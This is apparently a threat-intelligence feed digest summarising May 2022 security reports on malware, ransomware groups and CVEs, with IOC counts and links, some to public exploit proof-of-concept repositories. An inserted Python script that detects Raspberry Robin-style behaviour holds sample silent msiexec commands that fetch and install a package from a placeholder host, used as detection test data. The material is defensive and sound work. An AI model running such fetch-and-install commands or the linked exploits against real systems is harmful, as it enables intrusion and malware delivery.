#ParsedReport
05-05-2022
Nigerian Tesla: 419 scammer gone malware distributor unmasked
https://blog.malwarebytes.com/threat-intelligence/2022/05/nigerian-tesla-419-scammer-gone-malware-distributor-unmasked
Threats:
Agent_tesla (tags: phishing, ransomware, malware, spam, stealer, scam, dns, vpn)
Avemaria_rat
Netwire_rat
4shared
Cassandraprotector_tool
Geo:
Nigeria, Nigerian, Ukraine, Ukrainian
IOCs:
File: 2
Email: 25
Domain: 1
Scamming, phishing and other data theft is all part of Nigeria Tesla's portfolio.
#ParsedReport
05-05-2022
Cybercrime loves company: Conti cooperated with other ransomware gangs
https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker
Threats:
Conti (tags: ransomware, malware)
Ryuk (tags: ransomware)
Maze (tags: ransomware)
Lockbit (tags: ransomware)
Ragnarlocker (tags: ransomware)
Emotet (tags: ransomware)
Trickbot
Geo:
Russian
Conti kept a close eye on other ransomware groups and borrowed some of their techniques and best practices for their own operations.
#ParsedReport
05-05-2022
Shells blooming in Spring
https://labs.k7computing.com/index.php/shells-blooming-in-spring
Threats:
Spring4shell (tags: rat)
Log4shell_vuln (tags: rat)
Mirai
Emotet
CVEs:
CVE-2022-22965 [Vulners]
Vulners: Score: 7.5, CVSS: PENDING,
Vulners: Exploitation: Unknown
X-Force: Risk: 9.8
X-Force: Patch: Official fix
Soft:
- vmware spring framework (<5.2.20, <5.3.18)
- cisco cx cloud agent (<2.1.0)
- oracle communications cloud native core automated test suite (1.9.0, 22.1.0)
- oracle communications cloud native core console (1.9.0, 22.1.0)
- oracle communications cloud native core network exposure function (22.1.0)
have more...
CVE-2022-22695 [Vulners]
CVE-2022-22963 [Vulners]
Vulners: Score: 7.5, CVSS: PENDING,
Vulners: Exploitation: Unknown
X-Force: Risk: 9.8
X-Force: Patch: Official fix
Soft:
- vmware spring cloud function (<=3.1.6, <=3.2.2)
IOCs:
File: 8
Hash: 1
Links:
https://github.com/dinosn/CVE-2022-22963
https://github.com/lunasec-io/Spring4Shell-POC
https://github.com/reznok/Spring4Shell-POC
Yet another vulnerability has been reported in the Java platform, this time in the popular Java Spring framework, just a […]
#ParsedReport
06-05-2022
Mobile subscription Trojans and their little tricks
https://securelist.com/mobile-subscription-trojans-and-their-tricks/106412
Threats:
Vesub (tags: trojan, malware)
Triada
Joker (tags: trojan)
Industry:
E-commerce, Financial
Geo:
Russia, Arabia, Russian, Indonesia, Austria, China, Brazil, Saudi, Switzerland, Mexico, Turkey, Egypt, Poland, India, Germany, Africa, Thailand, Belarus, Algeria, Ukraine, Arab, Malaysia, Oman
IOCs:
File: 4
Hash: 37
The Trojan subscribers Joker, MobOk, Vesub and GriftHorse
Kaspersky analysis of mobile subscription Trojans Joker (Jocker), MobOk, Vesub and GriftHorse and their activity: technical description and statistics.
#ParsedReport
06-05-2022
macOS Malware Is More Reality Than Myth: Popular Threats and Challenges in Analysis
https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities
Threats:
Applescript
TTPs:
Tactics: 1
Techniques: 0
IOCs:
File: 2
Hash: 9
How CrowdStrike Analyzes macOS Malware to Optimize Automated Detection
Learn how CrowdStrike macOS malware research is turned into expert input and knowledge that’s used to optimize the automated detection capabilities of the Falcon platform.
#ParsedReport
06-05-2022
Raspberry Robin gets the worm early
https://redcanary.com/blog/raspberry-robin
Threats:
Raspberry_robin (tags: rat, malware)
TTPs:
Tactics: 5
Techniques: 5
IOCs:
File: 11
Path: 6
Domain: 2
Hash: 2
Registry: 1
Url: 2
Raspberry Robin is a worm spread by external drives that leverages Windows Installer to download a malicious DLL.
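The summary above names the behaviour that matters for detection: Windows Installer being used to fetch a package from a remote location. Below is an added example, not code from the Red Canary post and not a reproduction of their detection logic; it is a generic heuristic run over constructed process-creation events. Everything not in the summary is an assumption and is labelled as such in the code: the NDJSON event shape (`pid`, `parent_image`, `image`, `command_line`), the sample command lines, and the three heuristics (an http(s) URL argument to msiexec.exe, a quiet or passive install switch, an explicit non-standard port).

```python
"""Added example: flag Windows Installer (msiexec.exe) launches whose command
line points at a remote package, the behaviour the Red Canary summary describes.
This is NOT Red Canary's code or detection logic. Assumptions made here: the
NDJSON event shape, the constructed sample events, and the heuristics below.
"""
import json
import re
from urllib.parse import urlparse

# msiexec.exe as the process image, any casing, with or without a path.
MSIEXEC_RE = re.compile(r"(?:^|[\\/])msiexec(?:\.exe)?$", re.IGNORECASE)
# Any http(s) URL inside the command line.
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Quiet / passive install switches (/q, /qn, /qb, /quiet, /passive; slash or dash).
QUIET_RE = re.compile(r"(?<!\S)[-/](?:q[nb]?|quiet|passive)(?!\S)", re.IGNORECASE)
STANDARD_PORTS = {"http": 80, "https": 443}

# Constructed sample process-creation events (not real telemetry), one JSON object per line.
SAMPLE_LOG = [
    r'{"pid": 4120, "parent_image": "C:\\Windows\\System32\\cmd.exe", "image": "C:\\Windows\\System32\\msiexec.exe", "command_line": "msiexec /q /i http://example.invalid:8080/pkg.msi"}',
    r'{"pid": 4121, "parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\msiexec.exe", "command_line": "msiexec /i C:\\Temp\\setup.msi /qn"}',
    r'{"pid": 4122, "parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\msiexec.exe", "command_line": "msiexec /i https://example.invalid/update.msi"}',
    r'{"pid": 4123, "parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\explorer.exe", "command_line": "explorer http://example.invalid/"}',
    "this line is not JSON and must be skipped rather than abort the scan",
]


def remote_package_urls(command_line: str) -> list:
    """Return every http(s) URL found in a command line."""
    return URL_RE.findall(command_line or "")


def is_remote_msiexec(event: dict) -> bool:
    """True when the process image is msiexec.exe and its command line names a remote package."""
    if not MSIEXEC_RE.search(event.get("image", "")):
        return False
    return bool(remote_package_urls(event.get("command_line", "")))


def explain(event: dict) -> list:
    """Reasons an event matched, in plain words; empty list when it did not match."""
    if not is_remote_msiexec(event):
        return []
    cmd = event.get("command_line", "")
    reasons = ["msiexec.exe fetching a package from a URL"]
    if QUIET_RE.search(cmd):
        reasons.append("quiet/passive install switch (no UI shown to the user)")
    for url in remote_package_urls(cmd):
        parsed = urlparse(url)
        try:
            port = parsed.port  # raises ValueError on a non-numeric port
        except ValueError:
            reasons.append("unparseable port in URL")
            continue
        if port is not None and port != STANDARD_PORTS.get(parsed.scheme.lower()):
            reasons.append(f"non-standard port {port}")
    return reasons


def scan(log_lines) -> list:
    """Parse NDJSON process events and return one alert dict per matching event."""
    alerts = []
    for line in log_lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # malformed telemetry is skipped, not fatal
        reasons = explain(event)
        if reasons:
            alerts.append({
                "pid": event.get("pid"),
                "parent_image": event.get("parent_image"),
                "command_line": event.get("command_line"),
                "reasons": reasons,
            })
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert["pid"], "|", alert["command_line"], "|", "; ".join(alert["reasons"]))
```

Run as-is it reports the two msiexec launches that carry a URL and stays silent on the local install and on the browser launch; in a real pipeline the parent image (an external-drive shortcut, cmd.exe) would be the next field to enrich on.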
#ParsedReport
06-05-2022
Bad Rabbit Ransomware
https://www.varonis.com/blog/bad-rabbit-ransomware
Actors/Campaigns:
Sandworm
Threats:
Watering_hole_technique
Imminentmonitor_rat
Mimikatz
Mamba
Stop
Industry:
Financial
Geo:
Russia, Ukraine, Russian, Japan
CVEs:
CVE-2017-0145 [Vulners]
Vulners: Score: 9.3, CVSS: 8.9,
Vulners: Exploitation: True
X-Force: Risk: 9.8
X-Force: Patch: Official fix
Soft:
- microsoft server message block (1.0)
IOCs:
Domain: 1
IP: 1
Url: 26
Hash: 6
Links:
https://github.com/worawit/MS17-010/blob/master/zzz_exploit.py
Bad Rabbit is a ransomware strain that spread via hacked websites, infected systems via a fake Adobe installer and held encrypted files for Bitcoin.
#ParsedReport
06-05-2022
Emotet: New Delivery Mechanism to Bypass VBA Protection
https://www.netskope.com/blog/emotet-new-delivery-mechanism-to-bypass-vba-protection
Threats:
Emotet (tags: botnet, rat, trojan, malware, phishing, fraud)
Trickbot
Spring4shell
Industry:
Financial
IOCs:
File: 9
Hash: 143
Url: 12
IP: 67
YARA: Found
Links:
https://github.com/netskopeoss/NetskopeThreatLabsIOCs/tree/main/Emotet/IOCs/2022-05-06
https://github.com/netskopeoss/NetskopeThreatLabsIOCs/blob/main/Emotet/IOCs/script/decrypt_payload.py
https://github.com/netskopeoss/NetskopeThreatLabsIOCs/blob/main/Emotet/IOCs/script/decrypt_c2.py
https://github.com/netskopeoss/NetskopeThreatLabsIOCs/tree/main/Emotet
Summary Emotet started as a banking trojan in 2014 and later evolved to what has been considered the world's most dangerous malware by Europol, often used
PhD2022_IoCs_Scoring_v2.pdf
880.5 KB
Today at PhDays I gave a talk on how indicator scoring works at RST Cloud.
Here's the deck, by the way :)
#ParsedReport
19-05-2022
Space Pirates: Explore the tools and connections of a new hacker group
https://www.ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/space-pirates-tools-and-connections
Actors/Campaigns:
Spacepirates (tags: dropper, malware, dns, backdoor, rat, phishing, proxy)
Axiom
Emissary_panda
Ta428
Red_delta
Redfoxtrot
Stealthytrident
Nightscout
Threats:
Zupdax (tags: rat)
Former_first_rat
Climax_loader
Rtlshare
Plugx_rat (tags: backdoor, dropper)
9002 (tags: rat)
Deed_rat (tags: dns, rat)
Pcshare
Poison_ivy
Shadowpad
Revbshell
Tmanger
Albaniiutas_rat
Bluetraveller_rat
Hyperbro
Smokeloader_backdoor
Reactorbot
Gh0st_rat
Chromepass_tool
Industry:
Aerospace, Financial, Government, Energy
Geo:
Asian, Chinese, Russia, Mongolia, Georgia, Japanese
CVEs:
CVE-2017-0213 [Vulners]
Vulners: Score: 1.9, CVSS: 6.4,
Vulners: Exploitation: True
X-Force: Risk: 7
X-Force: Patch: Official fix
Soft:
- microsoft windows 10 (1607, -, 1511, 1703)
- microsoft windows rt 8.1 (*)
- microsoft windows server 2012 (-, r2)
- microsoft windows server 2008 (r2, *)
- microsoft windows 8.1 (*)
have more...
TTPs:
Tactics: 10
Techniques: 54
IOCs:
File: 51
Path: 20
Email: 1
IP: 23
Hash: 156
Registry: 8
Links:
https://github.com/obfuscator-llvm/obfuscator/wiki/Control-Flow-Flattening
https://github.com/bitsadmin/ReVBShell
https://github.com/vzex/dog-tunnel
https://github.com/LiveMirror/pcshare
PT ESC Threat Intelligence Blog
In this blog you can find information on current attacks by hacker groups around the world, analysis of their tools, incident information, the groups' TTPs, indicators of compromise, and the names of the corresponding detections in our products
#ParsedReport
19-05-2022
Phishing Campaign Delivering Three Fileless Malware: AveMariaRAT / BitRAT / PandoraHVNC Part I
https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware
Actors/Campaigns:
Keksec (tags: malware, phishing)
Threats:
Avemaria_rat (tags: ransomware, spam, malware, phishing, rat, ddos, proxy, botnet)
Bitrat (tags: ransomware, spam, malware, phishing, rat, ddos, proxy, botnet)
Pandorahvnc (tags: spam, botnet, malware, phishing, rat, ddos, proxy, ransomware)
Emotet (tags: malware, phishing)
Enemybot (tags: malware, phishing)
Vba/agent.ddon!tr (tags: malware)
Industry:
Financial
IOCs:
File: 17
Url: 5
Path: 2
Hash: 3
FortiGuard Labs discovered a phishing campaign delivering fileless malware to steal sensitive information from a victim’s device. Read our analysis to find out more about how the campaign executes …
#ParsedReport
19-05-2022
The BlackByte ransomware group is striking users all over the globe
http://blog.talosintelligence.com/2022/05/the-blackbyte-ransomware-group-is.html
Threats:
Blackbyte (tags: vpn, phishing, malware, ransomware)
Lolbin
Anydesk_tool
Proxyshell_vuln
Psexec_tool
Industry:
Financial
Geo:
Mexico, Netherlands, America, China, Colombia, Vietnam
IOCs:
File: 5
Path: 1
Links:
https://github.com/Neo23x0/Raccine
News summary
* Cisco Talos has been monitoring the BlackByte Ransomware Group for several months, infecting victims all over the world, from North America to Colombia, Netherlands, China, Mexico and Vietnam.
* The FBI released a joint cybersecurity advisory…
#ParsedReport
19-05-2022
Chaos Ransomware Variant Sides with Russia
https://www.fortinet.com/blog/threat-research/chaos-ransomware-variant-sides-with-russia
Threats:
Chaos (tags: phishing, ransomware, malware)
Conti (tags: ransomware)
Lockbit (tags: ransomware)
Filecoder
Industry:
Financial
Geo:
Russia, Japanese, Ukraine
TTPs:
Tactics: 5
Techniques: 6
IOCs:
File: 1
Hash: 1
FortiGuard Labs recently came across a variant of Chaos ransomware that appears to side with Russia. Read to find out more about the destructive outcome the variant brings to a compromised machine.…
#ParsedReport
19-05-2022
New SYK Crypter Distributed Via Discord
https://blog.morphisec.com/syk-crypter-discord
Threats:
Babadeda (tags: ransomware)
Dnetloader (tags: rat, ransomware, malware, stealer)
Asyncrat_rat (tags: ransomware)
Njrat_rat (tags: ransomware)
Quasar_rat (tags: ransomware)
Avemaria_rat (tags: ransomware)
Nanocore_rat (tags: ransomware)
Redline_stealer (tags: ransomware)
Agent_tesla
TTPs:
Tactics: 2
Techniques: 0
IOCs:
File: 6
Url: 26
Domain: 17
IP: 2
Path: 5
Hash: 47
SYK Crypter Distributing Malware Families Via Discord
As Discord’s popularity surges, a new SYK crypter is being used to deliver malware families via the community chat platform.
#ParsedReport
20-05-2022
Why Remediation Alone Is Not Enough When Infected by Malware
https://asec.ahnlab.com/en/34549
Actors/Campaigns:
Darkside (tags: malware)
Threats:
Cobalt_strike (tags: malware)
Runminer
Reverserdp_technique
Dropper/win.agent
Dropper/win32.agent
Nbtscan_tool
Malware/win64.generic
Win_loader
Geo:
Korean
CVEs:
CVE-2017-10271 [Vulners]
Vulners: Score: 5.0, CVSS: 4.9,
Vulners: Exploitation: True
X-Force: Risk: 9.8
X-Force: Patch: Official fix
Soft:
- oracle weblogic server (10.3.6.0.0, 12.2.1.1.0, 12.1.3.0.0, 12.2.1.2.0)
IOCs:
IP: 6
File: 4
Hash: 21
In January 2022, a prominent Korean company in the manufacturing industry had many of its internal systems infected by the Darkside ransomware. As the ransomware was found to be distributed using the AD group policy, AhnLab attempted to conduct a DC server…
#ParsedReport
20-05-2022
Emotet Being Distributed Using Various Files
https://asec.ahnlab.com/en/34556
Threats:
Emotet (tags: rat, trojan, malware)
Findpos
Trojan/win.agent.r488899
Industry:
Financial
Geo:
Korea
IOCs:
Url: 18
File: 24
Path: 1
Hash: 4
The ASEC analysis team has recently discovered the distribution of Emotet through link files (.lnk). The malware has been steadily distributed in the past, but starting from April, it was found that the Emotet downloader uses Excel files as well as link files…
#ParsedReport
20-05-2022
XLL malware distributed through mail
https://asec.ahnlab.com/ko/34497/
Threats:
Lokibot_stealer (tags: malware)
Trojan/win.agent.c5025449 (tags: malware)
Ransomware/win.carlos.c5025252 (tags: malware)
Geo:
Korea
IOCs:
File: 4
Url: 3
Hash: 5
Malware continues to be created and distributed in ever-changing forms and by changing methods. The AhnLab analysis team actively monitors and analyses these changes and makes sure they are reflected as detections in its products. This time we introduce XLL-format malware, whose distribution has been observed since last year. An XLL file, which runs under the .xll extension, is a Microsoft Excel add-in file and can be executed through MS Excel. What is notable is that execution is performed by MS Excel…
#ParsedReport
20-05-2022
Weaponization of Excel Add-Ins Part 2: Dridex Infection Chain Case Studies
https://unit42.paloaltonetworks.com/excel-add-ins-dridex-infection-chain
Threats:
Dridex (tags: malware, rat, dropper)
Agent_tesla
Atomic_bombing_technique
Geo:
Japan, Apac, Emea, America
IOCs:
File: 2
Hash: 6338
Url: 1496
IP: 4
Links:
https://github.com/pan-unit42/iocs/blob/master/Dridex%20Infection%20Chain%20Case%20Studies
We discuss XLL and XLM droppers that deliver Dridex samples. We cover examples of the Dridex infection chain.
#ParsedReport
20-05-2022
SpiderLabs Blog. Interactive Phishing: Using Chatbot-like Web Applications to Harvest Information
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/interactive-phishing-using-chatbot-like-web-applications-to-harvest-information
Actors/Campaigns:
Harvester (tags: phishing)
IOCs:
Url: 16
The Trustwave SpiderLabs Email Security team identified a phishing campaign pretending to be a missed package from DHL. What’s interesting about this campaign is that clicking on the link leads to a chatbot that discusses the missed package, provides pictures…
#ParsedReport
20-05-2022
PDF Malware Is Not Yet Dead
https://threatresearch.ext.hp.com/pdf-malware-is-not-yet-dead
Threats:
Snake_keylogger
CVEs:
CVE-2017-11882 [Vulners]
Vulners: Score: 9.3, CVSS: 8.3,
Vulners: Exploitation: True
X-Force: Risk: 7.8
X-Force: Patch: Official fix
Soft:
- microsoft office (2013, 2010, 2016, 2007)
IOCs:
File: 3
Hash: 6
Url: 3
Domain: 1
Links:
https://github.com/decalage2/oletools/wiki/oleid
https://github.com/decalage2/oletools/wiki/rtfobj
Don’t let cyber threats get the best of you. Read our post, PDF Malware Is Not Yet Dead, to learn more about cyber threats and cyber security.
#ParsedReport
20-05-2022
Mirai Malware Variants for Linux Double Down on Stronger Chips in Q1 2022
https://www.crowdstrike.com/blog/linux-mirai-malware-double-on-stronger-chips
Threats:
Mirai (tags: rat, malware, proxy, botnet, ddos)
Log4shell_vuln
Satori
Mozi
Bashlite
Xorddos
Industry:
Iot
IOCs:
Hash: 10
Mirai malware variants that target Linux devices have doubled on stronger Intel-powered chips in Q1 2022.